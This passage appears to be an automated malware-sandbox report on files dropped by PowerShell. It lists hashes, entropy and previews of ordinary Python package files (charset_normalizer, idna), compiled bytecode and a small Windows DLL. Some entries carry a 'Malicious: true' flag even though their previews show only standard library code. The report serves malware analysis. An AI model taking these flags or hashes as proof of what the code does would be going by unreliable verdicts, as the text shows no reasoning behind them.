                                                                                                                                                                                                                              Preview:import argparse..import sys..from json import dumps..from os.path import abspath, basename, dirname, join, realpath..from platform import python_version..from typing import List, Optional..from unicodedata import unidata_version....import charset_normalizer.md as md_module..from charset_normalizer import from_fp..from charset_normalizer.models import CliDetectionResult..from charset_normalizer.version import __version__......def query_yes_no(question: str, default: str = "yes") -> bool:.. """Ask a yes/no question via input() and return their answer..... "question" is a string that is presented to the user... "default" is the presumed answer if the user just hits <Enter>... It must be "yes" (the default), "no" or None (meaning.. an answer is required of the user)..... The "answer" return value is True for "yes" or False for "no"..... Credit goes to (c) https://stackoverflow.com/questions/3041986/apt-command-line-interface-like-yes-no-input.. """.. vali
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):266
                                                                                                                                                                                                                              Entropy (8bit):5.034532571591761
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:9twvK7lQ464g/zRnOw52KNdArsQx6GCeOn4R6IanqtVuxn:f17LG7Rn8KNhQ8GCt4RjanqtGn
                                                                                                                                                                                                                              MD5:662FB3F4EA612F51FD6E4D87055A2311
                                                                                                                                                                                                                              SHA1:DF42A265B743C7AA2FD53945D68AF54C7E0D5D0C
                                                                                                                                                                                                                              SHA-256:EECC3B3052053A828E99BCB8415E20429B551F80CCD2CA03D5EF31DA65A4E2F3
                                                                                                                                                                                                                              SHA-512:670A0DFE0DB88083F0DAB5B62A641AD6E565E62B9C654C83C62F7A7D2894C26358880450FF49BEA5C983710178F3F4FE07F7D4A98284A6D45B9837323B0B06B0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........v.Vfj...............................d.d.l.m.Z.m.Z...d.Z.y.)......)...cli_detect..query_yes_noN)...__main__r....r......__all__........PC:\Users\xbov\Desktop\pyops\Lib\site-packages\charset_normalizer/cli/__init__.py..<module>r........s...................r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10370
                                                                                                                                                                                                                              Entropy (8bit):5.459648386335583
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:ZGaMKGsh+rAviDG3YPzI6GLufNEOgsLCFXvVFRaYXu7p:5IJjDG3+mufNwL99FcF7p
                                                                                                                                                                                                                              MD5:805E3AFEAF314EEA42DB2D78400E6692
                                                                                                                                                                                                                              SHA1:538861B53C40E387405C6447B26DF2018AFE2822
                                                                                                                                                                                                                              SHA-256:13DA38358EE9B294CA43E7037A2553439BA6C02A423688DFA020D87AEBBF0F98
                                                                                                                                                                                                                              SHA-512:FFAF3ABF92CC73ADC21E5A39F822EAC32DFDF9567B86A619F8619C1536E2523509F5624235E452638B4CAA7EEF9802914B1985B26C37F4F7DE4B8DE418F51FCC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........v.Vf8'..............................d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.e.d.e.d.e.f.d...Z.d.d.e.e.e.........d.e.f.d...Z.e.d.k(..r...e...........y.y.)......N)...dumps)...abspath..basename..dirname..join..realpath)...python_version)...List..Optional)...unidata_version)...from_fp)...CliDetectionResult)...__version__..question..default..returnc.....................8.....d.d.d.d.d.d...}.|...d.}.n.|.d.k(..r.d.}.n.|.d.k(..r.d.}.n.t.........d.|.z...............t.........j...................j...................|.|.z.............t.................j...........................}.|...|.d.k(..r.|.|.....S.|.|.v.r.|.|.....S.t.........j...................j...................d............o).a....Ask a yes/no question via input() and return their answer... "question" is a string that is presented to the user.. "default" is the presumed answer if the user just hits <Enter>..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):42476
                                                                                                                                                                                                                              Entropy (8bit):4.506500945749441
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:wpR63vF6I6dA1qmi8ER7GapnRw89g/4u/A7pLP8A8vnmsFIGFz:463vH6dAUmiPY5uI
                                                                                                                                                                                                                              MD5:4C832423BA35785DCC80B0DDBD9207E0
                                                                                                                                                                                                                              SHA1:552FF010E2EBFE3DA0E6F38310BBC47220CEB833
                                                                                                                                                                                                                              SHA-256:DAD56B5D0F5CBC2F23B746FC819CD15EF5ED7B5A556D1ADAD00E5D3960D049AA
                                                                                                                                                                                                                              SHA-512:E3DCF75CF381374E429FF131D156B01CD6ED32B77170B06EC9762CC97E074805E44003991CEBFF485061BDE89D865E8FC5D5EBECA569207AA2609E70260AE742
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:# -*- coding: utf-8 -*-..from codecs import BOM_UTF8, BOM_UTF16_BE, BOM_UTF16_LE, BOM_UTF32_BE, BOM_UTF32_LE..from encodings.aliases import aliases..from re import IGNORECASE, compile as re_compile..from typing import Dict, List, Set, Union....# Contain for each eligible encoding a list of/item bytes SIG/BOM..ENCODING_MARKS: Dict[str, Union[bytes, List[bytes]]] = {.. "utf_8": BOM_UTF8,.. "utf_7": [.. b"\x2b\x2f\x76\x38",.. b"\x2b\x2f\x76\x39",.. b"\x2b\x2f\x76\x2b",.. b"\x2b\x2f\x76\x2f",.. b"\x2b\x2f\x76\x38\x2d",.. ],.. "gb18030": b"\x84\x31\x95\x33",.. "utf_32": [BOM_UTF32_BE, BOM_UTF32_LE],.. "utf_16": [BOM_UTF16_BE, BOM_UTF16_LE],..}....TOO_SMALL_SEQUENCE: int = 32..TOO_BIG_SEQUENCE: int = int(10e6)....UTF8_MAXIMAL_ALLOCATION: int = 1_112_064....# Up-to-date Unicode ucd/15.0.0..UNICODE_RANGES_COMBINED: Dict[str, range] = {.. "Control character": range(32),.. "Basic Latin": range(32, 128),.. "Latin-1 Supplement": range(1
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2125
                                                                                                                                                                                                                              Entropy (8bit):4.7244650981655125
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:/Y+Lw2ERLYA5yD3ShiUB757v/bKnCjRi6kRqzBQJB7riYeJ0rG6wTW:/Y+LfERLpyD3S/95773aWL0rG6wTW
                                                                                                                                                                                                                              MD5:A5026121DAE2BAF5F556823179F94C2D
                                                                                                                                                                                                                              SHA1:041A659F5E04949F0D66F192412F8EC7974BBEB3
                                                                                                                                                                                                                              SHA-256:29B271129BBB83ACC4DAE5D20774FEDF5EFC72089241D549949998FA0BF71003
                                                                                                                                                                                                                              SHA-512:D5A963006ABD8FE71B1C5A66F44603E2D4EC17E4F90D6E1A2A30C66DEC38D1D482BD2C713A1A3251E8A2652806A6315A2B23A69ED84E8CB11B743A75ADBCF948
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Any, Dict, Optional, Union..from warnings import warn....from .api import from_bytes..from .constant import CHARDET_CORRESPONDENCE......def detect(.. byte_str: bytes, should_rename_legacy: bool = False, **kwargs: Any..) -> Dict[str, Optional[Union[str, float]]]:.. """.. chardet legacy method.. Detect the encoding of the given byte string. It should be mostly backward-compatible... Encoding name will match Chardet own writing whenever possible. (Not on encoding name unsupported by it).. This function is deprecated and should be used to migrate your project easily, consult the documentation for.. further information. Not planned for removal..... :param byte_str: The byte sequence to examine... :param should_rename_legacy: Should we rename legacy encodings.. to their more modern equivalents?.. """.. if len(kwargs):.. warn(.. f"charset-normalizer disregard arguments '{','.join(list(k
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10752
                                                                                                                                                                                                                              Entropy (8bit):4.674392865869017
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:KGUmje72HzA5iJGhU2Y0hQMsQJCUCLsZEA4elh3XQMtCFXiHBpv9cX6gTim1qeSC:rjQ2HzzU2bRYoe1HH9cqgTimoe
                                                                                                                                                                                                                              MD5:D9E0217A89D9B9D1D778F7E197E0C191
                                                                                                                                                                                                                              SHA1:EC692661FCC0B89E0C3BDE1773A6168D285B4F0D
                                                                                                                                                                                                                              SHA-256:ECF12E2C0A00C0ED4E2343EA956D78EED55E5A36BA49773633B2DFE7B04335C0
                                                                                                                                                                                                                              SHA-512:3B788AC88C1F2D682C1721C61D223A529697C7E43280686B914467B3B39E7D6DEBAFF4C0E2F42E9DDDB28B522F37CB5A3011E91C66D911609C63509F9228133D
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..............................M....................................... ...?.......?.......?.a.....?.......Rich............................PE..d....jAe.........." ...%.....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20239
                                                                                                                                                                                                                              Entropy (8bit):4.462176748433946
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:X+NrqaBrMK0lzOXSSSI7IRmVf/L9t8/T/D/VnrgzfEz6zkzrD/UdBWgWHzW9k5G6:UrqaidOXkI7IRmV79PfKEqrlgWTTr
                                                                                                                                                                                                                              MD5:D22F1E5694206C2089871189EE9CEFF6
                                                                                                                                                                                                                              SHA1:D573C1456C0FBF637480436F2402550AC827DE20
                                                                                                                                                                                                                              SHA-256:17B4B4D3535D3E0900A266B6C39F7C21DC767255BD9635E544860A6502AC0900
                                                                                                                                                                                                                              SHA-512:6B6D277E614E82549B8E3389E6D657490CB7B367A5F4D7BF73681827008FCF491909915362F387AD62950515C8560C20D00AEBB71E33A4A96643C027D1096D33
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from functools import lru_cache..from logging import getLogger..from typing import List, Optional....from .constant import (.. COMMON_SAFE_ASCII_CHARACTERS,.. TRACE,.. UNICODE_SECONDARY_RANGE_KEYWORD,..)..from .utils import (.. is_accentuated,.. is_arabic,.. is_arabic_isolated_form,.. is_case_variable,.. is_cjk,.. is_emoticon,.. is_hangul,.. is_hiragana,.. is_katakana,.. is_latin,.. is_punctuation,.. is_separator,.. is_symbol,.. is_thai,.. is_unprintable,.. remove_accent,.. unicode_range,..)......class MessDetectorPlugin:.. """.. Base abstract class used for mess detection plugins... All detectors MUST extend and implement given methods... """.... def eligible(self, character: str) -> bool:.. """.. Determine if given character should be fed in... """.. raise NotImplementedError # pragma: nocover.... def feed(self, character: str) -> None:.. """.. The main routine to
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):151
                                                                                                                                                                                                                              Entropy (8bit):4.923660846981479
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:JSxYEVoC2gxAxCKKFuGA0jpSHEeGMMrMePAoSoKBW6BMW2y+C1e5k:aYEVo10AxCKeuXypcrNB96W2y+Bk
                                                                                                                                                                                                                              MD5:18D27E199B0D26EF9B718CE7FF5A8927
                                                                                                                                                                                                                              SHA1:EA9C9BFC82AD47E828F508742D7296E69D2226E4
                                                                                                                                                                                                                              SHA-256:2638CE9E2500E572A5E0DE7FAED6661EB569D1B696FCBA07B0DD223DA5F5D224
                                                                                                                                                                                                                              SHA-512:B8504949F3DDF0089164B0296E8371D7DCDD4C3761FB17478994F5E6943966528A45A226EBA2D5286B9C799F0EB8C99BD20CBD8603A362532B3A65DD058FA42E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import os; var = 'SETUPTOOLS_USE_DISTUTILS'; enabled = os.environ.get(var, 'local') == 'local'; enabled and __import__('_distutils_hack').add_shim(); .
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1541
                                                                                                                                                                                                                              Entropy (8bit):5.146190639127405
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:Or6iOorYJCrYJQz4943Je532sZEtI33tEHv:Or6forYJCrYJcN3w53l9uP
                                                                                                                                                                                                                              MD5:204C0612E40A4DD46012A78D02C80FB1
                                                                                                                                                                                                                              SHA1:97E2C8C10633CA4A49876343C652E92E7515C36F
                                                                                                                                                                                                                              SHA-256:A59F0B0EF3635874109A4461CA44FF7A70D50696E814767BFAF721D4C9B0DB0F
                                                                                                                                                                                                                              SHA-512:F9966F15A1ABB233E1FBDD31E135B89708DCB39769120604A437280D35D1AA0FA082FC83157BD8FC2C3D0A36B8519830849431091AF3B5B7DB89BB695DAFCBEB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:BSD 3-Clause License..Copyright (c) 2013-2024, Kim Davies and contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are.met:..1. Redistributions of source code must retain the above copyright. notice, this list of conditions and the following disclaimer...2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution...3. Neither the name of the copyright holder nor the names of its. contributors may be used to endorse or promote products derived from. this software without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS."AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT.LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR.A PARTICULA
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9888
                                                                                                                                                                                                                              Entropy (8bit):5.161998470974602
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:/Xknjsauqq7sqXWNPTwZ3nIeZBp7Dm2OsY8G1Bc9y0LROD4Mln7w:/UsamZS83nI0/7DmLss1Bc9BLROD467w
                                                                                                                                                                                                                              MD5:F326C32533BDD9789BF5E46FA82EDEE0
                                                                                                                                                                                                                              SHA1:8BF76EE290AC61F418F78993546A139FF30C90E9
                                                                                                                                                                                                                              SHA-256:3A2C4293E74A2D990FCBE31FBE23A688FBF02753B62BFF2BA82AC58C2FEEC72E
                                                                                                                                                                                                                              SHA-512:F539F3DCF5D92883C91EEB9595EAB961A30BC3DE733D808DDFC7DB45D83B90E8501B4A45C59498F0F3BF6FE0041F69FC410646A8A67CEE62ACA7310D76B83C80
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: idna.Version: 3.7.Summary: Internationalized Domain Names in Applications (IDNA).Author-email: Kim Davies <kim+pypi@gumleaf.org>.Requires-Python: >=3.5.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Intended Audience :: System Administrators.Classifier: License :: OSI Approved :: BSD License.Classifier: Operating System :: OS Independent.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.5.Classifier: Programming Language :: Python :: 3.6.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Languag
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1378
                                                                                                                                                                                                                              Entropy (8bit):5.779878682181178
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:in/2zD9vEA3uKmOLOZf5LaggIgAgNgqVgJgngSVgxKk6blB7UZAOmfJHQMeN4YWm:inuX9MjOidxP4bT7UxmhHXeNdWJZu
                                                                                                                                                                                                                              MD5:47EA3556461B9D9AAFE3545743E3D228
                                                                                                                                                                                                                              SHA1:E39E222B784D16BE8D5074C98230E1FFD6315102
                                                                                                                                                                                                                              SHA-256:3141F553C98869C909AC956B87FD6E3118DC2435E2696F31B1B98D36D8EB7A81
                                                                                                                                                                                                                              SHA-512:7B0B5E1CF27DD8C0D77441CEF96174351A01FB8E30E7F50EBD6C13359164BBCC636B0964584F186880CF875A48DD2C5D3C97E1C5DB80125012A30A964AE757E8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:idna-3.7.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..idna-3.7.dist-info/LICENSE.md,sha256=pZ8LDvNjWHQQmkRhykT_enDVBpboFHZ7-vch1Mmw2w8,1541..idna-3.7.dist-info/METADATA,sha256=OixCk-dKLZkPy-MfviOmiPvwJ1O2K_8rqCrFjC_uxy4,9888..idna-3.7.dist-info/RECORD,,..idna-3.7.dist-info/WHEEL,sha256=EZbGkh7Ie4PoZfRQ8I0ZuP9VklN_TvcZ6DSE5Uar4z4,81..idna/__init__.py,sha256=KJQN1eQBr8iIK5SKrJ47lXvxG0BJ7Lm38W4zT0v_8lk,849..idna/__pycache__/__init__.cpython-312.pyc,,..idna/__pycache__/codec.cpython-312.pyc,,..idna/__pycache__/compat.cpython-312.pyc,,..idna/__pycache__/core.cpython-312.pyc,,..idna/__pycache__/idnadata.cpython-312.pyc,,..idna/__pycache__/intranges.cpython-312.pyc,,..idna/__pycache__/package_data.cpython-312.pyc,,..idna/__pycache__/uts46data.cpython-312.pyc,,..idna/codec.py,sha256=PS6m-XmdST7Wj7J7ulRMakPDt5EBJyYrT3CPtjh-7t4,3426..idna/compat.py,sha256=0_sOEUMT4CVw9doD3vyRhX80X19PwqFoUBs7gWsFME4,321..idna/core.py,sha256=lyhpoe2vulEaB_65xhXmoKgO-xUqFDvcwxu5hpNNO4E,
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):81
                                                                                                                                                                                                                              Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX/QFM+vxP+tPCCfA5I:Rt1Qq2WBB3
                                                                                                                                                                                                                              MD5:24019423EA7C0C2DF41C8272A3791E7B
                                                                                                                                                                                                                              SHA1:AAE9ECFB44813B68CA525BA7FA0D988615399C86
                                                                                                                                                                                                                              SHA-256:1196C6921EC87B83E865F450F08D19B8FF5592537F4EF719E83484E546ABE33E
                                                                                                                                                                                                                              SHA-512:09AB8E4DAA9193CFDEE6CF98CCAE9DB0601F3DCD4944D07BF3AE6FA5BCB9DC0DCAFD369DE9A650A38D1B46C758DB0721EBA884446A8A5AD82BB745FD5DB5F9B1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: flit 3.9.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):849
                                                                                                                                                                                                                              Entropy (8bit):4.515992645856183
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:1bEveEaF+vqnuZ9UeAlDwdsyGF66xorAqv:tLcqwdsye66+rf
                                                                                                                                                                                                                              MD5:3159DCDF671A44354EB58EB6FFB4CBEA
                                                                                                                                                                                                                              SHA1:77EA165E2CDEF8A14C86F5480659B4515783A0BB
                                                                                                                                                                                                                              SHA-256:28940DD5E401AFC8882B948AAC9E3B957BF11B4049ECB9B7F16E334F4BFFF259
                                                                                                                                                                                                                              SHA-512:3DC2EFB6DB3EBF5C61401E2125060D0C82078907E4DD55C2346517578739B76A8A9C8940C87B61242928F02A8A0B6349B8951CE6EA82ACEAC19CC29CCCA1E41B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from .package_data import __version__.from .core import (. IDNABidiError,. IDNAError,. InvalidCodepoint,. InvalidCodepointContext,. alabel,. check_bidi,. check_hyphen_ok,. check_initial_combiner,. check_label,. check_nfc,. decode,. encode,. ulabel,. uts46_remap,. valid_contextj,. valid_contexto,. valid_label_length,. valid_string_length,.).from .intranges import intranges_contain..__all__ = [. "IDNABidiError",. "IDNAError",. "InvalidCodepoint",. "InvalidCodepointContext",. "alabel",. "check_bidi",. "check_hyphen_ok",. "check_initial_combiner",. "check_label",. "check_nfc",. "decode",. "encode",. "intranges_contain",. "ulabel",. "uts46_remap",. "valid_contextj",. "valid_contexto",. "valid_label_length",. "valid_string_length",.].
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):852
                                                                                                                                                                                                                              Entropy (8bit):5.20117829886751
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:oPVZjJRL/whvOcAZ/Qb8plAQb89usKNkbTYpEEEIY:AZnL/Fc+ob9Ik/YpEEEIY
                                                                                                                                                                                                                              MD5:A988A3499E214044BE6CD0D4AD30AC8C
                                                                                                                                                                                                                              SHA1:4C780C2E964BD0C186E0729560308BF80CB53223
                                                                                                                                                                                                                              SHA-256:03D1CEF15CE9264206D8D6E9EC6EE8AC74FE574992EEEFCAE3F2134E4C725DEE
                                                                                                                                                                                                                              SHA-512:C54C92574118AE86A210296CB6F5AA27BEF3E7652A769F8C079482581208A353DF9FA289A6FC83C48EC3CCAFCFCDA0662908741D5EDA1AE3CAC28AEB7E0FCBAC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........v.VfQ.........................t.....d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...g.d...Z.y.)......)...__version__)...IDNABidiError..IDNAError..InvalidCodepoint..InvalidCodepointContext..alabel..check_bidi..check_hyphen_ok..check_initial_combiner..check_label..check_nfc..decode..encode..ulabel..uts46_remap..valid_contextj..valid_contexto..valid_label_length..valid_string_length)...intranges_contain).r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....N)...package_datar......corer....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r......intrangesr......__all__........>C:\Users\xbov\Desktop\pyops\Lib\site-packages\idna/__init__.py..<module>r........s-..........%..........................(..).......r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4957
                                                                                                                                                                                                                              Entropy (8bit):5.105015682132298
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Y9GbEItVbfkW8a5EIDugNdp5IA5EWg7gVkEjyL:Yu5FfZGISgLp5IvWg0qe4
                                                                                                                                                                                                                              MD5:00A4F2E6609285B080223F473C6CD26B
                                                                                                                                                                                                                              SHA1:C37F999AC48E828DDCA8B42C4D2F16E7CDE0EB43
                                                                                                                                                                                                                              SHA-256:062096DC879B6AA92073EE95588DC88F63880585BFD2834A07F6DE49D65B61E4
                                                                                                                                                                                                                              SHA-512:50B06A15230B1DFF2651615EA76E7A44FFA9614B6B3E6932B5DF92D654876273C878DE233F1B3A4EDDAE313FDED8E854E643AD6D300180EFAF5B33B541CE8723
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........v.Vfb..............................d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.....e.j...................d.........Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.j"..........................Z...G.d...d.e.e.j&..........................Z...G.d...d.e.e.j(..........................Z.d.e.d.e.e.j,......................f.d...Z...e.j0..................e...........y.)......)...encode..decode..alabel..ulabel..IDNAError.....N)...Any..Tuple..Optionalu....[....]c.....................L.....e.Z.d.Z.d.d.e.d.e.d.e.e.e.f.....f.d...Z.d.d.e.d.e.d.e.e.e.f.....f.d...Z.y.)...Codec..data..errors..returnc.....................r.....|.d.k7..r.t.........d.j...................|...................|.s.y.t.........|.........t.........|.........f.S.).N..strict..Unsupported error handling "{}".......r....).r......formatr......len....selfr....r....s.... .;C:\Users\xbov\Desktop\pyops\Lib\site-packages\idna/codec.pyr....z.Codec.encode...
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):858
                                                                                                                                                                                                                              Entropy (8bit):4.970396401588023
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:hdFw8r/KNirs/WZojxfto3v4I8+F4Q2af/oZRFO:PUtWeNftowaYXY
                                                                                                                                                                                                                              MD5:0B4EB77DE475DF41B525623DD31EF801
                                                                                                                                                                                                                              SHA1:AF50DBF46D7D30D80ADC9EE92A98DD5F71D7F492
                                                                                                                                                                                                                              SHA-256:D4A9E439794BC3B18288BCAADB797CD735EB011B878B1BEFF55A6EA7EB4640A1
                                                                                                                                                                                                                              SHA-512:7DEB62A839BF5796E8FF66EA1EF048C72ACE0F0357C8B711C8003733307F2C3A97EFA1304EAAF5EF7F86B61396E798C8EFB8D795C4B61A36F2F0A61F1E9B9F82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........v.VfA.........................b.....d.d.l.....d.d.l.....d.d.l.m.Z.m.Z...d.e.d.e.f.d...Z.d.e.e.e.f.....d.e.f.d...Z.d.e.d.d.f.d...Z.y.)......)...*.....)...Any..Union..label..returnc...........................t.........|.........S...N)...encode..r....s.... .<C:\Users\xbov\Desktop\pyops\Lib\site-packages\idna/compat.py..ToASCIIr...................%.=........c...........................t.........|.........S.r....)...decoder....s.... r......ToUnicoder........r....r......sNc...........................t.........d...........).Nz,IDNA 2008 does not utilise nameprep protocol)...NotImplementedError).r....s.... r......nameprepr........s...........L..M..Mr....)...core..codec..typingr....r......str..bytesr......bytearrayr....r......r....r......<module>r........sT.......................3......5...........U.5.)..+..,................N.......N.......N.r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):15819
                                                                                                                                                                                                                              Entropy (8bit):5.401148987521872
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:PEX9ecLds8dyjGK4o1rC4ObtYk+K4jCRQcsqSp:Palds8/KlCZ9cCRQcsqg
